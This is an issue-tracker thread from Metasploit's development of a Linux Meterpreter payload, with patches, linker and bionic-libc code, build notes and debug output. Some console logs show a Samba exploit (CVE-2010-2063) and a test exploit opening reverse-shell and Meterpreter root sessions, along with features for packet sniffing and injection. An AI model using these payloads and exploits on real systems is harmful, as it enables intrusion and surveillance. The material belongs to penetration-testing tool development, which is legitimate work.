Bug #2418
Complete support for the POSIX Meterpreter
| Status: | Assigned | Start date: | 08/17/2010 | ||
|---|---|---|---|---|---|
| Priority: | Normal | Due date: | |||
| Assignee: | philip sanderson | % Done: | 70% |
||
| Category: | meterpreter - win32 | ||||
| Target version: | Open Backlog | ||||
| Resolution: | Release Note: |
Description
NOTE: This was originally bug #300, but I screwed up and deleted it. :((
Added by HD Moore 12 months ago. Updated less than a minute ago.
Complete support for the POSIX Meterpreter
Updated by HD Moore 11 months ago
Still waiting on code/updates from the two developers working on this, punting to 3.4-dev
Updated by HD Moore 10 months ago * Category changed from general to meterpreter
Updated by HD Moore 10 months ago * Priority changed from High to Normal
Updated by James Lee 3 months ago * Target version changed from Metasploit 3.4.0 to Metasploit 3.4.1
Updated by James Lee about 1 month ago
* Target version changed from Metasploit 3.4.1 to Metasploit 3.5
Barely compiles, needs lots of love. Pushing to 3.5
Updated by <a href=https://www.metasploit.com/redmine/users/1287>philip sanderson</a> about 19 hours ago * File msf3_add_map_fixed.diff added * File msf3_verbose_rtld_error.diff added
msf3_add_map_fixed.diff adds MAP_FIXED if the object is ET_EXEC. (Under linux, at least) this allows you to overwrite memory at that location if mapped already.
This is needed for example, if you are using metsrv_test ./metsrv.so and metsrv_test is ET_EXEC and mapped at 0x08048000 (as it will try to map metsrv_main there) and by default, it won't work (on ubuntu 10.04 at least).
msf3_verbose_rtld_error.diff displays the message if there is a problem. Useful for debugging why things aren't working 
With those two patches applied, I get:
connecting to 127.0.0.1:31337... fd=3 ap=0xbffe50ac start_main main=0x804be6d argc=2 argv=0xbffe5078 argc=2 argv=0xbffe5078 name=metsrv_main fd=3 metsrv_test: unknown: Undefined symbol "pthread_mutex_init" Segmentation fault
pthread_mutex_init is called via lock_create in common/thread.c
Checking ulibc/, there appears to be no implementation of pthreads present. After searching the internet, it appears that Android's libc/bionic/ directory has pthread implementation files licensed under BSD for linux kernel.
I am curious what people think about using that and merging into ulibc directory (or perhaps, replacing ulibc with android libc). I am willing to do required work if there is interest in applying it / having a nixterpeter.
Related issues
Associated revisions
remove the old elf server, see #2418, should have been part of r10154
git-svn-id: file:///home/svn/framework3/trunk@10155 4d416f70-5f16-0410-b530-b9f4589650da
update additional files, see #2418
git-svn-id: file:///home/svn/framework3/trunk@10156 4d416f70-5f16-0410-b530-b9f4589650da
sync up with Philip's code, see #2418
git-svn-id: file:///home/svn/framework3/trunk@10202 4d416f70-5f16-0410-b530-b9f4589650da
add termio.h back, see #2418
git-svn-id: file:///home/svn/framework3/trunk@10203 4d416f70-5f16-0410-b530-b9f4589650da
commit some fixes from philip, see #2418
git-svn-id: file:///home/svn/framework3/trunk@10272 4d416f70-5f16-0410-b530-b9f4589650da
commit some fixes from philip, see #2418
git-svn-id: file:///home/svn/framework3/trunk@10275 4d416f70-5f16-0410-b530-b9f4589650da
merge in another posix meterpreter update from philip, see #2418
git-svn-id: file:///home/svn/framework3/trunk@10307 4d416f70-5f16-0410-b530-b9f4589650da
updated binary, see #2418
git-svn-id: file:///home/svn/framework3/trunk@10316 4d416f70-5f16-0410-b530-b9f4589650da
meterpreter compiles on modern linux! see #2418
git-svn-id: file:///home/svn/framework3/trunk@13333 4d416f70-5f16-0410-b530-b9f4589650da
sniffer works, see #2418
git-svn-id: file:///home/svn/framework3/trunk@13360 4d416f70-5f16-0410-b530-b9f4589650da
History
Updated by Joshua J. Drake over 1 year ago
philip, Whatever you want to do here is great ok by us. We would all definitely like to see this come to fruition after all this time.
Updated by philip sanderson over 1 year ago
- File msf3_verbose_rtld_error.diff added
- File msf3_add_map_fixed.diff added
- File get_bionic_working.diff added
Re-attaching the two patches mentioned earlier.
I have gotten the android libc (bionic) up and running for experimenting with.
get_bionic_working.diff is what I had to do to get bionic compiling / generating files. Couple of surprising changes where needed. Add in a missing structure, syntax errors, etc.
With all that done:
# cat test.c
#include <pthread.h>
pthread_t id1, id2;
void thread_1()
{
printf("this is thread 1 speaking\n");
}
int main(int argc, char **argv)
{
__libc_init_common(0x08048000);
printf("%s %s\n", "hello", "from bionic, i think?\n");
int fd;
unsigned char *x;
fd = socket(2, 1, 0);
printf("fd is %d\n", fd);
x = malloc(4096);
printf("x is 0x%08x\n", x);
pthread_create(&id1, NULL, thread_1, NULL);
printf("thread created?\n");
pthread_join(id1, NULL);
}
# ./test
hello from bionic, i think?
fd is 3
x is 0x095d7410
thread created?
this is thread 1 speaking
testing that socket() / memory allocation / thread creation work.
gcc -nostdlib test.c -o test bionic.a -lgcc was compilation option used. The -lgcc is required due to 64 bit math it seems.
There's a couple of things remaining to do, such as getting all the code from the .a archive into the resulting binary, or converting it into a suitable shared library. I'll work on it and see what happens. Then I'll work on nixterpreter
Updated by philip sanderson over 1 year ago
Just a quick status update:
Due to problems with the existing rtld and linking against new headers (and failing to fix them up properly), I've modified the bionic loader as a replacement (implementing dlopenbuf, etc). The bionic loader needs a bit of cleaning up.
I'm currently working on recompiling openssl to be linked against the bionic libc and libm, and once that's done, the ground work should be done for actual work on meterpeter.
Updated by philip sanderson over 1 year ago
so far so good:
from testlinker.c
static struct libs libs[] = {
{ "libc.so.6", libc_so_gz, libc_so_gz_len, NULL },
{ "libm.so", libm_so_gz, libm_so_gz_len, NULL },
{ "libcrypto.so.0.9.8", libcrypto_so_gz, libcrypto_so_gz_len, NULL },
{ "libssl.so.0.9.8", libssl_so_gz, libssl_so_gz_len, NULL },
{ NULL, NULL, 0 }
};
void _start()
{
char *msg;
char *library;
int rc;
struct stat sb;
void *x;
int (*fp)();
soinfo *si;
struct libs *lib;
for(lib = &libs; lib->name != NULL; lib++) {
x = dlopenbuf(lib->name, lib->buf, lib->size);
if(! x) {
TRACE("[ failed to load %s/%08x/%08x, bailing ]\n", lib->name, lib->buf, lib->size);
exit(1);
}
lib->handle = x;
}
si = (soinfo *)dlopen("./testapp.so", RTLD_NOW|RTLD_GLOBAL); // quick test to verify we haven't broken it
TRACE("[ loaded testapp.so, looking for __libc_init_common() ]\n");
fp = dlsym(libs[0].handle, "__libc_init_common");
if(! fp) {
TRACE("[ failed resolving __libc_init_common(), bailing ]\n");
exit(1);
}
TRACE("[ Found __libc_init_common() @ %08x, calling ]\n", fp);
fp();
TRACE("[ performed __libc_init_common, now looking for main ]\n");
fp = dlsym(si, "main");
TRACE("[ main is at %08x, calling ... ]\n", fp);
fp(0, NULL, NULL);
TRACE("[ and main has returned. exiting ]\n", fp);
exit(0);
# cat testapp.c
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <pthread.h>
#include <stdio.h>
void *thread_test(void *arg)
{
printf("[%08x] %s is a test of %s\n", pthread_self(), "this", "threads");
}
int main(int argc, char **argv, char **envp)
{
pthread_t pid;
int rc;
printf("%s %s %s %s %s %s\n", "this", "is", "a", "test", "of", "printf");
rc = pthread_create(&pid, NULL, thread_test, NULL);
printf("pthread_create returned %d\n", rc);
pthread_join(pid, NULL);
printf("I've joined with that thread\n");
return 0;
}
# ./msflinker ... lots of debug output ... linker 0 SEARCH __libc_init_common in libc.so.6@0x00511000 0ab05d7e 134606836 linkerBucket hash: 146 linkersi->bucket is 0x00511140 linkertrying si->bucket[659] for symbol linkertrying si->bucket[267] for symbol linker 0 FOUND __libc_init_common in libc.so.6 (0002c1b0) 00000175 linker[ Found __libc_init_common() @ 0053d1b0, calling ] linker[ performed __libc_init_common, now looking for main ] linker 0 SEARCH main in ./testapp.so@0x00049000 000737fe 134606836 linkerBucket hash: 1 linkersi->bucket is 0x00049120 linkertrying si->bucket[9] for symbol linker 0 FOUND main in ./testapp.so (00000387) 00000206 linker[ main is at 00049387, calling ... ] this is a test of printf pthread_create returned 0 [08ed6410] this is a test of threads I've joined with that thread linker[ and main has returned. exiting ]
ignore the following, they are for my records at the moment (in case they leave my history buffer).
./Configure threads no-zlib no-krb5 386 --prefix=/tmp/out linux-msf no-dlfcn shared linux-msf = linux-elf sans -ldl .. make CC="gcc -I/opt/msf3/external/source/meterpreter/source/server/posix/dynlink_v2/hack -I /opt/bionic/libc/include -I /opt/bionic/libc/kernel/common/linux/ -I /opt/bionic/libc/kernel/common/ -I /opt/bionic/libc/arch-x86/include/ -I /opt/bionic/libc/kernel/arch-x86/ -I/opt/bionic/libc/private -fPIC -DPIC -nostdinc -nostdlib -Dwchar_t='char' -fno-builtin -D_SIZE_T_DECLARED -DElf_Size='u_int32_t' -I/opt/bionic/libm/include -L/opt/bionic/libc/out/x86/ -D_BYTE_ORDER=_LITTLE_ENDIAN -lc" depend clean all
So next steps are working out the metsrv build system, modifying/integrating it, writing a proper metsrv_rtld function. Once that's done, I'll send a suitable patch. Then meterpreter itself. I'm confident that openssl is linked in properly, as the linker performs all relocations before returning from dlopen/dlopenbuf.
It seems that we can't have the bionic libc out of the svn tree, because it will require various patches to make it truly suitable (/system/bin/sh -> /bin/sh, /system/etc/resolv.conf -> /etc/resolv.conf, in several #defines)
Updated by Joshua J. Drake over 1 year ago
I don't see any major problem with patching bionic after a check out. In fact, we often fork things and maintain our own copy (only later re-syncing occasionally).
Since Bionic appears to be BSD licensed, doing this shouldn't be an issue.
Is ulibc used for anything else?
Updated by philip sanderson over 1 year ago
ulibc is not used for anything else.
I'm currently preparing a clean source tree and removing unused code (such as ulibc, server/elf), and putting new code in. Once I've done testing and wrote some documentation (compilation notes / order things need to be done in), I'll attach the required patches.
I've got everything to the stage where I can start work on meterpreter itself :-), so a good time to synchronize everything.
Updated by philip sanderson over 1 year ago
- File meterpeter_bionic_rtld_changes.patch added
Here's the first patch.
It contains:
1) Instructions
2) Modified bionic libc / libm (well, added a makefile for this)
3) removed ulibc, server/elf.
4) new rtld based on bionic linker.
5) misc fixes
With these changes done, I can start work on meterpreter itself. Later on the libcrypto.so.gz / libssl.so.gz files will need to be changed.. (and maybe the headers for an upgrade :p)
With the patch applied, this is where it will get up to:
linker 0 FOUND __libc_init_common in libc.so (0002c2e0) 00000175
linker[ __libc_init_common is at 005482e0, calling ]
linker 0 SEARCH server_setup in metsrv_main@0x0076f000 01f55700 135954816
linkerBucket hash: 148
linkersi->bucket is 0x0076f174
linkertrying si->bucket69 for symbol
linker 0 FOUND server_setup in metsrv_main (0000455a) 00000264
linker[ metsrv server_setup is at 0077355a, calling ]
Program received signal SIGSEGV, Segmentation fault.
0x007735e6 in ?? ()
433 // Store our thread handle
434 remote->hServerThread = serverThread->handle;
due to:
418 serverThread = thread_open();
which comes down to:
#else
/*
* XXX add POSIX implementation
*/
return NULL;
#endif
:-) Fingers crossed, it won't take too much time after this. The linker/library code currently is aimed towards linux/x86. maybe once meterpreter is done, i'll expand upon it.. though that involves learning enough of a new os or a new arch :\ haha
Updated by philip sanderson over 1 year ago
linker 0 FOUND server_setup in metsrv_main (00004bdd) 00000455
linker[ metsrv server_setup is at 00136bdd, calling ]
[SERVER] Initializing...
[SERVER] module loaded at 0x504B5320
[SERVER] main server thread: handle=0x00000000 id=0x000016CB sigterm=0x09A75028
[SERVER] Initializing tokens...
[SERVER] Flushing the socket handle...
[SERVER] Initializing SSL...
[SERVER] Negotiating SSL...
[SERVER] Sending a HTTP GET request to the remote side...
[SERVER] Completed writing the HTTP GET request: 27
[SERVER] Registering dispatch routines...
[SERVER] Entering the main server dispatch loop...
[DISPATCH] entering server_dispatch( 0x09A75038 )
[DISPATCH] created command_process_thread 0x09A91C18, handle=0x00000000
[COMMAND] Processing method core_channel_eof
[COMMAND] Calling completion handlers...
Active sessions ===============
Id Type Information Connection
-- ---- ----------- ----------
5 meterpreter 127.0.0.1:4444 -> 127.0.0.1:46429code is up at http://github.com/philip-k-sanderson/metasploit-posix-meterpreter (saves me from posting another 150k+ patch).
Updated by Joshua J. Drake over 1 year ago
- Status changed from New to Assigned
- Assignee changed from HD Moore to Joshua J. Drake
- % Done changed from 0 to 70
Hey Philip,
It's an absolute nightmare to merge your changes from git->svn due to the number of false-positive differences that come from the lack of the $Id$ and $Revision$ svn keyword replacements.
I have tried my best to get everything with r10154 and r10155. Can you let us know if I missed anything?
Updated by philip sanderson over 1 year ago
There is a fair lot of stuff missing, such as not nuking ulibc directory / other changes. Let me have a look at it, and I'll see what I can come up with.
Updated by philip sanderson over 1 year ago
Try something along the lines of:
git clone git://github.com/philip-k-sanderson/metasploit-posix-meterpreter.git jdrake_git
git svn clone -r 10155 https://www.metasploit.com/svn/framework3/trunk/ jdrake_svn
diff -urN -x .git jdrake_git jdrake_svn
it should resolve any $Id$ problems you were seeing.
Updated by philip sanderson over 1 year ago
ah. I thought there was stuff missing when I looked at http://www.metasploit.com/redmine/projects/framework/repository/revisions/10154, as it chops off all the rtld / Makefile stuff.
Seems to have merged properly when I updated my local git copy. (otherwise I would have expected merge problems)
Updated by Joshua J. Drake over 1 year ago
Philip,
Feel free to create additional tickets for feature requests etc. I have some pty code if you want to integrate it here.
The whole team is looking forward to the point where this all works as a payload for an exploit 
Updated by philip sanderson over 1 year ago
I am currently working on execute / shell support. I won't add pty code just yet (though the pty will be a major feature i think).
One that's done, I plan to test what needs to happen for payload to work, then work out staging shellcode/s.
I think the shell/bind_tcp & shell/reverse_tcp would be a good level 1 stager. second level stager does mmap / reading into huge buffer and whatever else is needed for the linker to run... (such as allocate a new stack, etc.) Once that's ready it will transfer control to it.
The level 1 stager will probably be required for where their is not enough room for level 2.
Updated by philip sanderson over 1 year ago
- File newstuff.diff added
Here's a new patch with various fixes.
execute -f /bin/sh -i works (with no pty support).
commit 249804e7a93fb6df25f12a95ef400681ac6ce5ff
Author: Philip K Sanderson <philip.k.sanderson@gmail.com>
Date: Fri Aug 27 20:06:51 2010 +1000
Add _WIN32 ifdef'scommit 82989249b7011abb328fb66bf04d0b4d12b700ac
Author: Philip K Sanderson <philip.k.sanderson@gmail.com>
Date: Fri Aug 27 19:17:34 2010 +1000
Re-created repo because of issues with my understanding of git-svn.Numerous patches:- getresuid/getresgid syscalls are broken due to not passing parameters.
- Properly POSIX scheduler implementation
- Add process execution support in.
- Change metsrv_main to libmetsrv_main.so so symbols can be exported properlty
(needed for scheduler, it seems).
- Handle EPIPE / SIGCHLD.
- Fix strcmp() routine ;\
- Random other stuffnow for payload time.
there's a couple of approaches that I need to explore to find the optimal one (the easiest would be et_exec at fixed address).
Updated by philip sanderson over 1 year ago
Some other changes:
Added PTY support to execute -f /bin/sh -i
Added a dlsocket() routine in case msflinker is started up without a socket.
Wrote payload stager assembly.
Currently figuring out the ruby side of things with stager / where to put files, etc.
Updated by philip sanderson over 1 year ago
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 588 exploits - 297 auxiliary
+ -- --=[ 229 payloads - 27 encoders - 8 nops
msf > use test/exploitme
msf exploit(exploitme) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
msf exploit(exploitme) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(exploitme) > set RPORT 4545
RPORT => 4545
msf exploit(exploitme) > set PAYLOAD linux/x86/new_meterpreter/reverse_tcp
PAYLOAD => linux/x86/new_meterpreter/reverse_tcp
msf exploit(exploitme) > exploit
[*] Started reverse handler on 127.0.0.1:4444
[*] Sending 50 byte payload...[0]
[*] Transmitting intermediate stager for over-sized stage...(99 bytes)
[*] Sending stage (1200128 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:45357) at Tue Aug 31 16:06:38 +1000 2010
meterpreter > execute -f /bin/sh -i
Process created.
Channel 1 created.
# whoami
root
# id -a
uid=0(root) gid=0(root) groups=0(root)
getting there
Updated by philip sanderson over 1 year ago
- File git.diff added
Here's a patch that applies cleanly against svn head.
# patch -p1 --dry-run <../git.diff patching file documentation/posix_meterpreter.txt patching file external/source/meterpreter/source/bionic/libc/arch-x86/syscalls/getresgid.S patching file external/source/meterpreter/source/bionic/libc/arch-x86/syscalls/getresuid.S patching file external/source/meterpreter/source/bionic/libc/include/signal.h patching file external/source/meterpreter/source/bionic/libc/include/termio.h patching file external/source/meterpreter/source/common/arch/posix/scheduler.c patching file external/source/meterpreter/source/common/compat_types.h patching file external/source/meterpreter/source/common/thread.c patching file external/source/meterpreter/source/common/thread.h patching file external/source/meterpreter/source/extensions/stdapi/server/precomp.h patching file external/source/meterpreter/source/extensions/stdapi/server/stdapi.c patching file external/source/meterpreter/source/extensions/stdapi/server/sys/config/config.c patching file external/source/meterpreter/source/extensions/stdapi/server/sys/process/process.c patching file external/source/meterpreter/source/server/rtld/basic_libc.c patching file external/source/meterpreter/source/server/rtld/elf2bin.c patching file external/source/meterpreter/source/server/rtld/Makefile patching file external/source/meterpreter/source/server/rtld/metsrv_rtld.c patching file external/source/meterpreter/source/server/rtld/rtldtest.c patching file external/source/meterpreter/source/server/server_setup.c patching file external/source/meterpreter/workspace/common/Makefile patching file external/source/meterpreter/workspace/ext_posix_sample/Makefile patching file external/source/meterpreter/workspace/ext_server_stdapi/Makefile patching file external/source/meterpreter/workspace/metsrv/Makefile patching file modules/payloads/stages/linux/x86/meterpreter.rb
In addition to that
rm external/source/meterpreter/openssl/lib/*/*/*so.gz
or so
Updated by Joshua J. Drake over 1 year ago
Philip, I'm working to sync things up here. I noticed there are no binaries, and unfortunately, my attempts to recreate the build process have lead to repetitive failure.
Would you be so kind as to submit the required binaries.
Also, do you think you have time to try to further automate/debug the build process? There appear to be some steps missing 
Updated by philip sanderson over 1 year ago
I will go through the build process information in the documentation I wrote to see what's missing / could be improved. As for automating it completely, that should be possible.
What distribution are you building on? I'm using ubuntu 10.04.
I'll attach binaries shortly
Updated by philip sanderson over 1 year ago
- File msflinker added
- File msflinker.bin added
- File ext_server_stdapi.so added
ext_server_stdapi.so needs to go to data/meterpreter/ext_server_stdapi.so
msflinker.bin needs to go to data/msflinker_linux_x86.bin (see modules/payloads/stages/linux/x86/meterpreter.rb)
msflinker = raw binary. will default to 127.0.0.1:4444, so you can test it with
use multi/handler set PAYLOAD linux/x86/metsvc_reverse_tcp set LHOST 127.0.0.1 exploit
./msflinker
Updated by Joshua J. Drake over 1 year ago
I committed the binaries in r10223. I didn't commit the "msflinker" program since it's only used for testing.
Also, I tested inside using an exploit and found some strange results. If you don't have an insight on this it may be a bigger issue... See the following:
fear:0:~$ msfconsole -n -r research/cve-2010-2063/debian5/chain_reply.msfrc
[-] ***
[-] * WARNING: No database support: String User Disabled Database Support
[-] ***
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 606 exploits - 299 auxiliary
+ -- --=[ 224 payloads - 27 encoders - 8 nops
=[ svn r10212 updated today (2010.09.01)
resource (research/cve-2010-2063/debian5/chain_reply.msfrc)> set RHOST <victim>
RHOST => <victim>
resource (research/cve-2010-2063/debian5/chain_reply.msfrc)> set PAYLOAD linux/x86/shell/reverse_tcp
PAYLOAD => linux/x86/shell/reverse_tcp
resource (research/cve-2010-2063/debian5/chain_reply.msfrc)> use exploit/linux/samba/chain_reply
resource (research/cve-2010-2063/debian5/chain_reply.msfrc)> exploit
[*] Started reverse handler on <attacker>:4444
[*] Trying return address 0x081ed5f2...
[*] Sending stage (36 bytes) to <victim>
[*] Command shell session 1 opened (<attacker>:4444 -> <victim>:57065) at 2010-09-02 11:35:00 -0500
id
uid=0(root) gid=0(root)
exit
[*] Command shell session 1 closed.
msf exploit(chain_reply) >
msf exploit(chain_reply) > set PAYLOAD linux/x86/meterpreter/reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
msf exploit(chain_reply) > rexploit
[*] Started reverse handler on <attacker>:4444
[*] Trying return address 0x081ed5f2...
[*] Transmitting intermediate stager for over-sized stage...(98 bytes)
[*] Trying return address 0x081ed5f2...
[*] Transmitting intermediate stager for over-sized stage...(98 bytes)
[*] Trying return address 0x081ed5f2...
[*] Transmitting intermediate stager for over-sized stage...(98 bytes)
[*] Sending stage (1212416 bytes) to <victim>
[*] Trying return address 0x081ed5f2...
[*] Transmitting intermediate stager for over-sized stage...(98 bytes)
[*] Sending stage (1212416 bytes) to <victim>
[*] Meterpreter session 2 opened (<attacker>:4444 -> <victim>:57066) at 2010-09-02 11:35:21 -0500
[-] Failed to load extension: No such file or directory - data/meterpreter/ext_server_priv.lso
[*] Meterpreter session 3 opened (<attacker>:4444 -> <victim>:57067) at 2010-09-02 11:35:22 -0500
[*] Sending stage (1212416 bytes) to <victim>
[-] Failed to load extension: No such file or directory - data/meterpreter/ext_server_priv.lso
[-] Exploit failed: deadlock; recursive locking
[*] Exploit completed, but no session was created.
[*] Sending stage (1212416 bytes) to <victim>
[*] Meterpreter session 4 opened (<attacker>:4444 -> <victim>:57068) at 2010-09-02 11:35:23 -0500
[-] Failed to load extension: No such file or directory - data/meterpreter/ext_server_priv.lso
[*] Meterpreter session 5 opened (<attacker>:4444 -> <victim>:57069) at 2010-09-02 11:35:25 -0500
[-] Failed to load extension: No such file or directory - data/meterpreter/ext_server_priv.lso
msf exploit(chain_reply) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter >
Updated by philip sanderson over 1 year ago
Hmm, I'm not entirely sure what's happening there. I have a suspicion it might be something to do with the exploit continuing on and letting the handler take care of it.
As a side note, I'm porting the sniffer plugin over as well for kicks..
To make things easier I need to develop a .gdbrc for msflinker. it looks like "add-symbol-file" and looping over solist will do the trick.
Updated by philip sanderson over 1 year ago
- File 05_modify_stdapi_makefile.diff added
- File 00_extra_includes.diff added
- File 01_close_channel.diff added
- File 02_complete_makefile.diff added
- File 03_process_fixes.diff added
- File 04_support_libpcap.h added
Here are some patches to apply against the tree, nothing ground breaking.
I will see if I can reproduce the samba server exploit and improve remote loading.
Updated by Joshua J. Drake over 1 year ago
Committed those 5 diffs...
I wouldn't worry about the multiple sessions, it appears to be related to staging and/or payload handlers.
The samba exploit has some reliability issues due to the seemingly non-deterministic handling of the talloc chunks. I worked around it by just trying over and over until we get a session, but it seems the session notification doesn't happen until later.
Updated by philip sanderson over 1 year ago
- File 00_use_perl_for_makefile.diff added
- File 01_fix_common_makefile.diff added
- File 02_fix_duplicate_real_dprintfs.diff added
- File 03_makefile_builds_libpcap.diff added
Some more patches. Support for building libpcap in the master makefile is the main feature. Once I get the network pivot support done I'll attach more binaries.
Updated by philip sanderson over 1 year ago
- File 00_libpcap_headers.diff added
Patch file to include libpcap headers. This will be used by ext_server_stdapi to implement obtaining interface information is a hopefully portable way.
Updated by philip sanderson over 1 year ago
- File payload_fork_option.diff added
- File implement_ipconfig.diff added
payload_fork_option.diff - if you're bruteforcing a threaded service and triggering a heap reset, you may kill the process before the shellcode runs / the session_created flag is set. this implements a fork() / parent exit_group() prepend stub.
implement_ipconfig.diff does:
meterpreter > ipconfigeth0
Hardware MAC: 08:00:27:de:8d:ac
IP Address : 10.1.1.14
Netmask : 255.255.255.0lo
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0etc.
The route command takes more work (involves netlink sockets, which I am unfamiliar with).
Updated by philip sanderson over 1 year ago
- File implement_route_printing.diff added
seems that netlink sockets are very useful for obtaining information..
meterpreter > route
Network routes ==============
Subnet Netmask Gateway
------ ------- -------
10.1.1.0 255.255.255.0 0.0.0.0
0.0.0.0 0.0.0.0 10.1.1.1Updated by philip sanderson over 1 year ago
- File basic_malloc_implementation.diff added
trivial malloc implementation for linker code when doing decompression. reduces kernel calls significantly :-)
Updated by philip sanderson over 1 year ago
- File msflinker.bin added
- File ext_server_stdapi.lso added
thanks for applying the patches to main line. here are updated binaries built on latest source.
Updated by philip sanderson over 1 year ago
- File 00_implement_dl_locking.diff added
- File 01_implement_sniffer_extension.diff added
- File ext_server_sniffer.so added
implement a mutex in dl* functions to prevent race conditions.
implement ext_server_sniffer using libpcap. adds support for custom filters in ruby code.
meterpreter > sniffer_interfaces 1 - 'eth0' ( type:0 mtu:1514 usable:false dhcp:false wifi:false ) 2 - 'any' ( type:0 mtu:1514 usable:false dhcp:false wifi:false ) 3 - 'lo' ( type:0 mtu:1514 usable:false dhcp:false wifi:false ) meterpreter > sniffer_start 1 50000 icmp [*] Capture started on interface 1 (50000 packet buffer) .. generate icmp traffic .. meterpreter > sniffer_dump 1 icmp.pcap [*] Flushing packet capture buffer for interface 1... [*] Flushed 10 packets (1180 bytes) [*] Downloaded 100% (1180/1180)... [*] Download completed, converting to PCAP... [*] PCAP file written to icmp.pcap meterpreter > sniffer_stop 1 [*] Capture stopped on interface 1
Updated by philip sanderson over 1 year ago
- File 00_qword_compile.diff added
- File 01_thread_error_handling.diff added
msflinker.bin needs to be copied to msflinker_linux_x86.bin or so, and two more fixes
Updated by philip sanderson over 1 year ago
- File 02_networkpug.diff added
Implements a packet proxy / injection facility. The ruby side of things is very rough at the moment. Suggestions / fixes appreciated
Updated by philip sanderson over 1 year ago
- File 02_networkpug.diff added
attached wrong patch. slightly updated one
Updated by philip sanderson over 1 year ago
- File 03_fix_sprintf.diff added
Updated by philip sanderson over 1 year ago
- File 04_crash_info.diff added
Add ucontext.h for arch-x86. Implement a debugging handler for various signals.
Updated by Joshua J. Drake over 1 year ago
- Assignee changed from Joshua J. Drake to philip sanderson
Ooops, got the wrong one! Assigning to Philip for further work!
Updated by James Lee about 1 year ago
- Target version changed from Metasploit 3.5.0 to Metasploit 3.6